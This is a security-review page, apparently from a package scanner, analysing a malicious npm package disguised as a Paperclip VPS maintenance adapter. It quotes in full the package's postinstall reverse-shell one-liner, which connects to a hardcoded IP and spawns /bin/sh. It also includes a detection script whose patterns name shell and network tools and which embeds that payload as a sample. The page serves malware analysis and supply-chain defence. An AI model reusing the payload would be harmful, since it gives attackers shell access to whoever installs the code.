
vps-maintenance-paperclip-adapter@0.1.1

Paperclip external adapter that runs maintenance shell commands on the Paperclip host VPS (or another machine over SSH)

AI Security Review

scanned 3h ago · by lpm-firewall-ai

The package ships an unconditional npm postinstall reverse shell: installing it connects to a hardcoded IP and port and wires /bin/sh's standard streams to that socket.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install (package installation lifecycle hook: postinstall)
Impact
Remote attacker can execute shell commands as the installing user on the host during installation.
Mechanism
install-time reverse shell via node net.connect and child_process.spawn('/bin/sh')
Attack narrative
On installation, npm runs the package.json postinstall hook. That hook starts a Node one-liner that connects out to 185.112.147.174:7007, spawns /bin/sh, and pipes the shell's stdin, stdout and stderr to the socket. Because the connection is outbound, it passes through NAT and egress-permissive firewalls, and the attacker gets interactive command execution as the installing user before any legitimate Paperclip adapter code runs. The hook fires for any install that pulls the package in, including as a transitive dependency, unless lifecycle scripts are disabled (npm install --ignore-scripts, or ignore-scripts=true in .npmrc).
Rationale
Source inspection confirms a deterministic install-time reverse shell in package.json, independent of the documented adapter functionality. This is concrete malicious behavior with remote command execution on install.
Evidence
Evidence (8 files)
  • package.json
  • dist/index.js
  • dist/server/execute.js
  • dist/server/index.js
  • dist/server/config-schema.js
  • dist/server/test.js
  • dist/metadata.js
  • README.md
Network endpoints (1)
  • 185.112.147.174:7007
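The static gate the review describes (an install-time lifecycle hook that both opens an outbound socket and spawns a shell) can be reproduced with a short manifest check. The following is an added example, not lpm-firewall-ai's scanner and not code from the package: the hook names are npm's own, but the regex heuristics, the severity labels, the function names auditPackageManifest, classifyHook, extractEndpoints and verdict, and the sample manifests are my own construction. The only text taken from this page is the postinstall string; the rest of the sample manifests is made up.

```javascript
// Added example: a minimal static gate for npm install-time lifecycle scripts.
// Not lpm-firewall-ai's scanner; heuristics, names and samples are constructed here.

// npm runs these hooks for every install that pulls the package in, including
// as a transitive dependency (unless scripts are disabled with --ignore-scripts).
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Outbound-connection indicators: Node net/tls/http(s) APIs and common CLI downloaders.
const SOCKET_RE = /require\(\s*['"](?:net|tls|dgram|https?|ws)['"]\s*\)|createConnection\(|\bconnect\(\s*\d{1,5}\s*,|new\s+WebSocket\(|\b(?:curl|wget|nc|ncat|socat)\b/;
// Shell / command-execution indicators.
const SHELL_RE = /child_process|\bspawn(?:Sync)?\(|\bexec(?:Sync|File)?\(|\/bin\/(?:ba|da|z)?sh\b|\bcmd\.exe\b|\bpowershell\b|\bbash\s+-i\b/;
// Inline evaluation keeps the payload out of any file a reviewer would open.
const INLINE_EVAL_RE = /\bnode\s+(?:-e|--eval)\b|\beval\(|\bnew\s+Function\(|\bbase64\b/;
// Hardcoded endpoints: net.connect(port, 'host') argument order, and literal host:port.
const CONNECT_ARGS_RE = /connect\(\s*(\d{1,5})\s*,\s*['"]([^'"]+)['"]/g;
const HOST_PORT_RE = /\b((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})\b/g;

function extractEndpoints(command) {
  const found = new Set();
  for (const m of command.matchAll(CONNECT_ARGS_RE)) found.add(`${m[2]}:${m[1]}`);
  for (const m of command.matchAll(HOST_PORT_RE)) found.add(`${m[1]}:${m[2]}`);
  return [...found].sort();
}

function classifyHook(hook, command) {
  const reasons = [];
  const socket = SOCKET_RE.test(command);
  const shell = SHELL_RE.test(command);
  if (INLINE_EVAL_RE.test(command)) reasons.push('inline code evaluation (node -e / eval / base64)');
  if (socket) reasons.push('opens an outbound network connection');
  if (shell) reasons.push('spawns a shell or executes commands');
  const endpoints = extractEndpoints(command);
  if (endpoints.length) reasons.push(`hardcoded endpoint(s): ${endpoints.join(', ')}`);
  // Socket plus shell in one install hook is the reverse-shell combination;
  // either indicator alone still deserves a human look.
  let severity = 'low';
  if (socket && shell) severity = 'critical';
  else if (socket) severity = 'high';
  else if (shell) severity = 'medium';
  if (reasons.length === 0) reasons.push('install-time hook present; inspect the referenced script');
  return { hook, command, severity, reasons, endpoints };
}

function auditPackageManifest(manifestText) {
  const pkg = JSON.parse(manifestText);
  const scripts = (pkg && typeof pkg.scripts === 'object' && pkg.scripts) || {};
  const findings = INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => classifyHook(hook, scripts[hook]));
  return { name: pkg.name, version: pkg.version, findings };
}

// Gate decision: block on critical/high, hold for review on medium/low, allow when clean.
function verdict(report) {
  const levels = report.findings.map((f) => f.severity);
  if (levels.includes('critical') || levels.includes('high')) return 'block';
  if (levels.length > 0) return 'review';
  return 'allow';
}

// Constructed sample manifests. The postinstall line in the first one is the
// exact script quoted on this page; everything else in these manifests is made up.
const MALICIOUS_MANIFEST = JSON.stringify({
  name: 'vps-maintenance-paperclip-adapter',
  version: '0.1.1',
  scripts: {
    build: 'tsc -p .',
    postinstall: 'node -e "const c=require(\'net\').connect(7007,\'185.112.147.174\');const p=require(\'child_process\').spawn(\'/bin/sh\',[]);c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);"',
  },
});
const BENIGN_MANIFEST = JSON.stringify({
  name: 'example-native-addon',
  version: '2.0.0',
  scripts: { postinstall: 'node scripts/check-prebuilt.js' },
});
const CLEAN_MANIFEST = JSON.stringify({
  name: 'example-pure-js',
  version: '1.0.0',
  scripts: { test: 'node --test' },
});

if (typeof require !== 'undefined' && require.main === module) {
  for (const text of [MALICIOUS_MANIFEST, BENIGN_MANIFEST, CLEAN_MANIFEST]) {
    const report = auditPackageManifest(text);
    console.log(`${report.name}@${report.version}: ${verdict(report)}`);
    for (const f of report.findings) console.log(`  [${f.severity}] ${f.hook}: ${f.reasons.join('; ')}`);
  }
}
```

Run against the page's manifest the check reports a single critical finding on postinstall with the endpoint 185.112.147.174:7007 and a block verdict; a hook that merely runs a script file is held for review rather than blocked, which is the limit of a manifest-only gate: the referenced file still has to be read, since the same payload moved into scripts/postinstall.js would leave package.json looking clean.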

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines postinstall lifecycle hook executed on npm install.
  • postinstall opens TCP connection to 185.112.147.174:7007 using net.connect.
  • postinstall spawns /bin/sh and pipes stdin/stdout/stderr to the remote socket, creating a reverse shell.
  • The reverse shell is unrelated to the documented Paperclip adapter behavior in README.md and dist/*.js.
  • Runtime adapter command execution in dist/server/execute.js is user-configured, but the install hook is unconditional.
Evidence against
  • dist/index.js only exports metadata and createServerAdapter.
  • dist/server/execute.js runs configured commands through adapter-utils and supports documented SSH mode.
  • README.md documents a maintenance adapter that runs configured shell commands; it does not disclose install-time remote shell behavior.
  • rg found the hardcoded remote endpoint only in package.json postinstall.
Behavioral surface
Source: EnvironmentVars
Supply chain: HighEntropyStrings
Manifest: No manifest risk signals triggered.
scanned 6 file(s), 16.2 KB of source

Source & flagged code

2 flagged

package.json
scripts.postinstall = node -e "const c=require('net').connect(7007,'185.112.147.174');const p=require('child_process').spawn('/bin/sh',[]);c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);"
Critical: Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.

package.json
scripts.postinstall = node -e "const c=require('net').connect(7007,'185.112.147.174');const p=require('child_process').spawn('/bin/sh',[]);c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);"
High: Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.

Findings

1 Critical, 1 High, 2 Medium, 3 Low
  • Critical: Red Install Lifecycle Script (package.json)
  • High: Install Time Lifecycle Scripts (package.json)
  • Medium: Environment Vars
  • Medium: Structural Risk Force Deep Review
  • Low: Non Install Lifecycle Scripts
  • Low: Scripts Present
  • Low: High Entropy Strings